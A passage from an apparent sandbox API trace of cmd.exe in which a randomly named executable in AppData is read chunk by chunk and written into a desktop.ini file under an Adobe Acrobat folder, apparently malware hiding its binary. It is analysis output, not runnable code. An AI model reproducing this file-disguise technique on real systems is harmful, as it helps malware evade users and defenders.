hConsoleHandle=0xb, lpMode=0x26ed60 | out: lpMode=0x26ed60) returned 1 [0146.586] _get_osfhandle (_FileHandle=2) returned 0xb [0146.586] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x26ed94 | out: lpConsoleScreenBufferInfo=0x26ed94) returned 1 [0146.586] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0146.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.586] GetFileType (hFile=0x7) returned 0x2 [0146.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.587] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f484 | out: lpMode=0x26f484) returned 1 [0146.587] _dup (_FileHandle=1) returned 3 [0146.587] _close (_FileHandle=1) returned 0 [0146.587] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini", _String2="con") returned -53 [0146.587] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f454, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0146.587] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0146.587] GetConsoleTitleW (in: lpConsoleTitle=0x26f284, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.588] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x26ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ede8) returned 0x41e798 [0146.588] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0146.588] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0146.588] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0146.588] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26dcf4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0146.588] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0146.588] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.588] GetFileType (hFile=0x58) returned 0x1 [0146.588] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.588] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x26dd4c | out: lpFileSizeHigh=0x26dd4c*=0x0) returned 0x7d600 [0146.588] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.588] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.588] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.588] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.590] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.590] GetFileType (hFile=0x50) returned 0x1 [0146.590] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.590] GetFileType (hFile=0x50) returned 0x1 [0146.590] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.590] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] GetFileType (hFile=0x50) returned 0x1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] GetFileType (hFile=0x50) returned 0x1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] GetFileType (hFile=0x50) returned 0x1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.592] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.592] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.593] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.594] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.595] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.595] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.596] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.596] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.598] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.598] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.599] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.599] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, 